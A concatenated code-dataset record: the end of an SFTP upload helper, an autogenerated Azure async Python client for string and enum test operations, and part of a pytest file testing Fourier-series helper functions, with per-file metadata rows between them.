- host (str): Name of the host to use.
- username (str): Username used to authenticate.
- password (str): Password used to authenticate.
- port_number (int): The port number to connect to the server.
- remote_path (str): The remote SFTP file path.
- local_path (str): The local file path to upload from.
Raises:
- ValueError: Raised if a required parameter is not supplied.
- ClientError: Raised if exception occurs when connecting/uploading from the server.
"""
if not host:
raise ValueError("A host name must be provided")
if not username:
raise ValueError("User name must be provided")
if not password:
raise ValueError("A password must be provided")
if not port_number:
raise ValueError("A port_number name must be provided")
if not remote_path:
raise ValueError("A remote_path must be provided")
if not local_path:
raise ValueError("A local_path must be provided")
with contextlib.closing(self._create_connection()) as conn:
conn.put(
localpath=local_path,
remotepath=remote_path,
confirm=True,
)
| 35.768889
| 98
| 0.604871
| 954
| 8,048
| 4.984277
| 0.137317
| 0.063091
| 0.032387
| 0.030284
| 0.792219
| 0.782334
| 0.782334
| 0.782334
| 0.750158
| 0.750158
| 0
| 0.00036
| 0.310388
| 8,048
| 224
| 99
| 35.928571
| 0.856396
| 0.361456
| 0
| 0.714286
| 0
| 0
| 0.133887
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0.111111
| 0.047619
| 0
| 0.134921
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
7ce1d323aae98bd5c71532484e332022d2b60f20
| 30,619
|
py
|
Python
|
test/vanilla/version-tolerant/Expected/AcceptanceTests/BodyStringVersionTolerant/bodystringversiontolerant/aio/operations/_operations.py
|
changlong-liu/autorest.python
|
1f03e4c6a11934d385fab050dc44041f1e91e9ff
|
[
"MIT"
] | null | null | null |
test/vanilla/version-tolerant/Expected/AcceptanceTests/BodyStringVersionTolerant/bodystringversiontolerant/aio/operations/_operations.py
|
changlong-liu/autorest.python
|
1f03e4c6a11934d385fab050dc44041f1e91e9ff
|
[
"MIT"
] | null | null | null |
test/vanilla/version-tolerant/Expected/AcceptanceTests/BodyStringVersionTolerant/bodystringversiontolerant/aio/operations/_operations.py
|
changlong-liu/autorest.python
|
1f03e4c6a11934d385fab050dc44041f1e91e9ff
|
[
"MIT"
] | null | null | null |
# pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Optional, TypeVar
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator_async import distributed_trace_async
from ...operations._operations import (
build_enum_get_not_expandable_request,
build_enum_get_referenced_constant_request,
build_enum_get_referenced_request,
build_enum_put_not_expandable_request,
build_enum_put_referenced_constant_request,
build_enum_put_referenced_request,
build_string_get_base64_encoded_request,
build_string_get_base64_url_encoded_request,
build_string_get_empty_request,
build_string_get_mbcs_request,
build_string_get_not_provided_request,
build_string_get_null_base64_url_encoded_request,
build_string_get_null_request,
build_string_get_whitespace_request,
build_string_put_base64_url_encoded_request,
build_string_put_empty_request,
build_string_put_mbcs_request,
build_string_put_null_request,
build_string_put_whitespace_request,
)
T = TypeVar("T")
JSONType = Any
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class StringOperations:
"""StringOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace_async
async def get_null(self, **kwargs: Any) -> Optional[str]:
"""Get null string value value.
:return: str or None
:rtype: str or None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[Optional[str]]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_string_get_null_request()
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
@distributed_trace_async
async def put_null(self, string_body: Optional[str] = None, **kwargs: Any) -> None:
"""Set string value null.
:param string_body: string body.
:type string_body: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if string_body is not None:
_json = string_body
else:
_json = None
request = build_string_put_null_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
@distributed_trace_async
async def get_empty(self, **kwargs: Any) -> str:
"""Get empty string value value ''.
:return: str
:rtype: str
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[str]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_string_get_empty_request()
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
@distributed_trace_async
async def put_empty(self, **kwargs: Any) -> None:
"""Set string value empty ''.
:keyword string_body: string body. The default value is "". Note that overriding this default
value may result in unsupported behavior.
:paramtype string_body: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
string_body = kwargs.pop("string_body", "") # type: str
request = build_string_put_empty_request(
content_type=content_type,
json=string_body,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
@distributed_trace_async
async def get_mbcs(self, **kwargs: Any) -> str:
"""Get mbcs string value '啊齄丂狛狜隣郎隣兀﨩ˊ〞〡¦℡㈱‐ー﹡﹢﹫、〓ⅰⅹ⒈€㈠㈩ⅠⅫ! ̄ぁんァヶΑ︴АЯаяāɡㄅㄩ─╋︵﹄︻︱︳︴ⅰⅹɑɡ〇〾⿻⺁䜣€'.
:return: str
:rtype: str
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[str]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_string_get_mbcs_request()
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
@distributed_trace_async
async def put_mbcs(self, **kwargs: Any) -> None:
"""Set string value mbcs '啊齄丂狛狜隣郎隣兀﨩ˊ〞〡¦℡㈱‐ー﹡﹢﹫、〓ⅰⅹ⒈€㈠㈩ⅠⅫ! ̄ぁんァヶΑ︴АЯаяāɡㄅㄩ─╋︵﹄︻︱︳︴ⅰⅹɑɡ〇〾⿻⺁䜣€'.
:keyword string_body: string body. The default value is
"啊齄丂狛狜隣郎隣兀﨩ˊ〞〡¦℡㈱‐ー﹡﹢﹫、〓ⅰⅹ⒈€㈠㈩ⅠⅫ! ̄ぁんァヶΑ︴АЯаяāɡㄅㄩ─╋︵﹄︻︱︳︴ⅰⅹɑɡ〇〾⿻⺁䜣€". Note that overriding
this default value may result in unsupported behavior.
:paramtype string_body: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
string_body = kwargs.pop(
"string_body", "啊齄丂狛狜隣郎隣兀﨩ˊ〞〡¦℡㈱‐ー﹡﹢﹫、〓ⅰⅹ⒈€㈠㈩ⅠⅫ! ̄ぁんァヶΑ︴АЯаяāɡㄅㄩ─╋︵﹄︻︱︳︴ⅰⅹɑɡ〇〾⿻⺁䜣€"
) # type: str
request = build_string_put_mbcs_request(
content_type=content_type,
json=string_body,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
@distributed_trace_async
async def get_whitespace(self, **kwargs: Any) -> str:
"""Get string value with leading and trailing whitespace
':code:`<tab>`:code:`<space>`:code:`<space>`Now is the time for all good men to come to the aid
of their country:code:`<tab>`:code:`<space>`:code:`<space>`'.
:return: str
:rtype: str
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[str]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_string_get_whitespace_request()
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
@distributed_trace_async
async def put_whitespace(self, **kwargs: Any) -> None:
"""Set String value with leading and trailing whitespace
':code:`<tab>`:code:`<space>`:code:`<space>`Now is the time for all good men to come to the aid
of their country:code:`<tab>`:code:`<space>`:code:`<space>`'.
:keyword string_body: string body. The default value is " Now is the time for all good men
to come to the aid of their country ". Note that overriding this default value may result in
unsupported behavior.
:paramtype string_body: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
string_body = kwargs.pop(
"string_body", " Now is the time for all good men to come to the aid of their country "
) # type: str
request = build_string_put_whitespace_request(
content_type=content_type,
json=string_body,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
@distributed_trace_async
async def get_not_provided(self, **kwargs: Any) -> str:
"""Get String value when no string value is sent in response payload.
:return: str
:rtype: str
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[str]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_string_get_not_provided_request()
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
@distributed_trace_async
async def get_base64_encoded(self, **kwargs: Any) -> bytearray:
"""Get value that is base64 encoded.
:return: bytearray
:rtype: bytearray
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[bytearray]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_string_get_base64_encoded_request()
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
@distributed_trace_async
async def get_base64_url_encoded(self, **kwargs: Any) -> bytes:
"""Get value that is base64url encoded.
:return: bytes
:rtype: bytes
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[bytes]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_string_get_base64_url_encoded_request()
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
@distributed_trace_async
async def put_base64_url_encoded(self, string_body: bytes, **kwargs: Any) -> None:
"""Put value that is base64url encoded.
:param string_body: string body.
:type string_body: bytes
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
_json = string_body
request = build_string_put_base64_url_encoded_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
@distributed_trace_async
async def get_null_base64_url_encoded(self, **kwargs: Any) -> Optional[bytes]:
"""Get null value that is expected to be base64url encoded.
:return: bytes or None
:rtype: bytes or None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[Optional[bytes]]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_string_get_null_base64_url_encoded_request()
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
class EnumOperations:
"""EnumOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace_async
async def get_not_expandable(self, **kwargs: Any) -> str:
"""Get enum value 'red color' from enumeration of 'red color', 'green-color', 'blue_color'.
:return: str. Possible values are: "red color", "green-color", and "blue_color".
:rtype: str
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# response body for status code(s): 200
response.json() == "str" # Optional.
"""
cls = kwargs.pop("cls", None) # type: ClsType[str]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_enum_get_not_expandable_request()
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
@distributed_trace_async
async def put_not_expandable(self, string_body: str, **kwargs: Any) -> None:
"""Sends value 'red color' from enumeration of 'red color', 'green-color', 'blue_color'.
:param string_body: string body. Possible values are: "red color", "green-color", and
"blue_color".
:type string_body: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
_json = string_body
request = build_enum_put_not_expandable_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
@distributed_trace_async
async def get_referenced(self, **kwargs: Any) -> str:
"""Get enum value 'red color' from enumeration of 'red color', 'green-color', 'blue_color'.
:return: str. Possible values are: "red color", "green-color", and "blue_color".
:rtype: str
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# response body for status code(s): 200
response.json() == "str" # Optional.
"""
cls = kwargs.pop("cls", None) # type: ClsType[str]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_enum_get_referenced_request()
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
@distributed_trace_async
async def put_referenced(self, enum_string_body: str, **kwargs: Any) -> None:
"""Sends value 'red color' from enumeration of 'red color', 'green-color', 'blue_color'.
:param enum_string_body: enum string body. Possible values are: "red color", "green-color", and
"blue_color".
:type enum_string_body: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
_json = enum_string_body
request = build_enum_put_referenced_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
@distributed_trace_async
async def get_referenced_constant(self, **kwargs: Any) -> JSONType:
"""Get value 'green-color' from the constant.
:return: JSON object
:rtype: JSONType
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# response body for status code(s): 200
response.json() == {
"ColorConstant": "green-color", # Default value is "green-color". Referenced
Color Constant Description. Has constant value: "green-color".
"field1": "str" # Optional. Sample string.
}
"""
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_enum_get_referenced_constant_request()
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
@distributed_trace_async
async def put_referenced_constant(self, enum_string_body: JSONType, **kwargs: Any) -> None:
"""Sends value 'green-color' from a constant.
:param enum_string_body: enum string body.
:type enum_string_body: JSONType
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
enum_string_body = {
"ColorConstant": "green-color", # Default value is "green-color". Referenced
Color Constant Description. Has constant value: "green-color".
"field1": "str" # Optional. Sample string.
}
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
_json = enum_string_body
request = build_enum_put_referenced_constant_request(
content_type=content_type,
json=_json,
)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
| 38.514465
| 106
| 0.647898
| 3,412
| 30,619
| 5.6568
| 0.071805
| 0.039376
| 0.035439
| 0.025595
| 0.915911
| 0.907311
| 0.882441
| 0.858764
| 0.849593
| 0.835967
| 0
| 0.012034
| 0.250955
| 30,619
| 794
| 107
| 38.562972
| 0.821147
| 0.080571
| 0
| 0.757709
| 0
| 0
| 0.028948
| 0.003125
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004405
| false
| 0
| 0.015419
| 0
| 0.090308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6b3843b991e8e2730b1021815dd31277a43c32d8
| 8,566
|
py
|
Python
|
bokeh_app/scripts/functions/test_fourier.py
|
goodteamname/spino
|
aa8c6cfa9f94a639c306d85ca6df2483108fda37
|
[
"MIT"
] | null | null | null |
bokeh_app/scripts/functions/test_fourier.py
|
goodteamname/spino
|
aa8c6cfa9f94a639c306d85ca6df2483108fda37
|
[
"MIT"
] | 9
|
2020-10-26T10:57:00.000Z
|
2020-11-01T14:48:21.000Z
|
bokeh_app/scripts/functions/test_fourier.py
|
goodteamname/spino
|
aa8c6cfa9f94a639c306d85ca6df2483108fda37
|
[
"MIT"
] | 1
|
2020-10-26T10:41:31.000Z
|
2020-10-26T10:41:31.000Z
|
import pytest
import numpy.testing as npt
@pytest.mark.parametrize(
"test, expectedShape, raises",
[
(
[1, 2, 3],
(1, 3),
None
),
(
[1, 2, 3, 4, 5, 6, 7],
(3, 3),
None
),
(
[1, 2, 3, 4, 5, 6],
(2, 3),
None
),
(
[[1, 2, 3], [4, 5, 6]],
(0, 0),
ValueError
),
(
[1],
(0, 0),
ValueError
),
(
[],
(0, 0),
ValueError
),
])
def test_dft(test, expectedShape, raises):
"""Test normalisation works for arrays of one and positive integers."""
import fourier_functions
if raises:
with pytest.raises(raises):
npt.assert_equal(fourier_functions.fourier_to_coefficients(test)[1].shape, expectedShape)
else:
npt.assert_equal(fourier_functions.fourier_to_coefficients(test)[1].shape, expectedShape)
@pytest.mark.parametrize(
"test, expectedShape, raises",
[
(
[1, 2, 3],
(1, 3),
None
),
(
[1, 2, 3, 4, 5, 6, 7],
(3, 3),
None
),
(
[1, 2, 3, 4, 5, 6],
(2, 3),
None
),
(
[[1, 2, 3], [4, 5, 6]],
(0, 3),
ValueError
),
(
[1],
(0, 0),
ValueError
),
(
[],
(0, 0),
ValueError
),
])
def test_dfs(test, expectedShape, raises):
"""Test normalisation works for arrays of one and positive integers."""
import fourier_functions
if raises:
with pytest.raises(raises):
npt.assert_equal(fourier_functions.dfs(test)[1].shape, expectedShape)
else:
npt.assert_equal(fourier_functions.dfs(test)[1].shape, expectedShape)
@pytest.mark.parametrize(
"test_data, test_times, expectedShape, raises",
[
(
[1, 2, 3],
[1, 2, 3],
(3, 2),
None
),
(
[1, 2, 3, 4, 5, 6, 7],
[1, 2, 3, 4, 5, 6, 7],
(7, 2),
None
),
(
[1, 2, 3, 4, 5, 6],
[1, 2, 3, 4, 5, 6],
(5, 2),
None
),
(
[[1, 2, 3], [4, 5, 6]],
[1, 2, 3, 4, 5, 6],
(3, 2),
ValueError
),
(
[1],
[1, 2, 3, 4, 5, 6],
(1, 2),
ValueError
),
(
[],
[1, 2, 3, 4, 5, 6],
(1, 0),
ValueError
),
])
def test_freq(test_data, test_times, expectedShape, raises):
"""Test normalisation works for arrays of one and positive integers."""
import fourier_functions
if raises:
with pytest.raises(raises):
npt.assert_equal(fourier_functions.fourier_to_freq_spectrum(test_data, test_times).shape, expectedShape)
else:
npt.assert_equal(fourier_functions.fourier_to_freq_spectrum(test_data, test_times).shape, expectedShape)
@pytest.mark.parametrize(
"test_data, expectedShape, raises",
[
(
[1, 2, 3],
(3, ),
None
),
(
[1, 2, 3, 4, 5, 6, 7],
(7,),
None
),
(
[1, 2, 3, 4, 5, 6],
(6,),
None
),
(
[[1, 2, 3], [4, 5, 6]],
(0,),
ValueError
),
(
[1],
(0,),
ValueError
),
(
[],
(0,),
ValueError
),
])
def test_fourier_approx(test_data, expectedShape, raises):
"""Test normalisation works for arrays of one and positive integers."""
import fourier_functions
if raises:
with pytest.raises(raises):
# alpha0, table = fourier_functions.fourier_to_coefficients(test_data)
npt.assert_equal(
fourier_functions.fourier_approx(
fourier_functions.fourier_to_coefficients(test_data)[0],
fourier_functions.fourier_to_coefficients(test_data)[1],
test_data).shape,
expectedShape)
else:
alpha0, table = fourier_functions.fourier_to_coefficients(test_data)
npt.assert_equal(fourier_functions.fourier_approx(alpha0, table, test_data).shape, expectedShape)
@pytest.mark.parametrize(
"test_data, test_times, components, expectedShape0, expectedShape1, expectedShape2, raises",
[
(
[1, 2, 3, 4, 5],
[1, 2, 3, 4, 5],
2,
(5, 3),
(2, 3),
(5, 4),
None
),
(
[1, 2, 3, 4, 5, 6, 7],
[1, 2, 3, 4, 5, 6, 7],
2,
(7, 3),
(2, 3),
(7, 4),
None
),
(
[1, 2, 3, 4, 5, 6],
[1, 2, 3, 4, 5, 6],
2,
(6, 3),
(2, 3),
(6, 4),
None
),
(
[[1, 2, 3], [4, 5, 6]],
[1, 2, 3, 4, 5, 6],
2,
(5, 3),
(3, 2),
(5, 4),
ValueError
),
(
[1],
[1, 2, 3, 4, 5, 6],
2,
(1, 3),
(2, 3),
(1, 4),
ValueError
),
(
[],
[1, 2, 3, 4, 5, 6],
2,
(0, 3),
(2, 3),
(0, 4),
ValueError
),
])
def test_calc_residuals(test_data, test_times, components, expectedShape0, expectedShape1, expectedShape2, raises):
"""Test normalisation works for arrays of one and positive integers."""
import fourier_functions
if raises:
with pytest.raises(raises):
alpha0, df = fourier_functions.fourier_to_coefficients(test_data)
print(alpha0)
print(df)
npt.assert_equal(
fourier_functions.calc_residuals(alpha0, df, test_data, test_times, components)[0].shape,
expectedShape0
)
npt.assert_equal(
fourier_functions.calc_residuals(alpha0, df, test_data, test_times, components)[1].shape,
expectedShape1
)
npt.assert_equal(
fourier_functions.calc_residuals(alpha0, df, test_data, test_times, components)[2].shape,
expectedShape2
)
else:
alpha0, df = fourier_functions.fourier_to_coefficients(test_data)
print(alpha0)
print(df)
npt.assert_equal(
fourier_functions.calc_residuals(alpha0, df, test_data, test_times, components)[0].shape,
expectedShape0
)
npt.assert_equal(
fourier_functions.calc_residuals(alpha0, df, test_data, test_times, components)[1].shape,
expectedShape1
)
npt.assert_equal(
fourier_functions.calc_residuals(alpha0, df, test_data, test_times, components)[2].shape,
expectedShape2
)
@pytest.mark.parametrize(
"test_data, test_times",
[
(
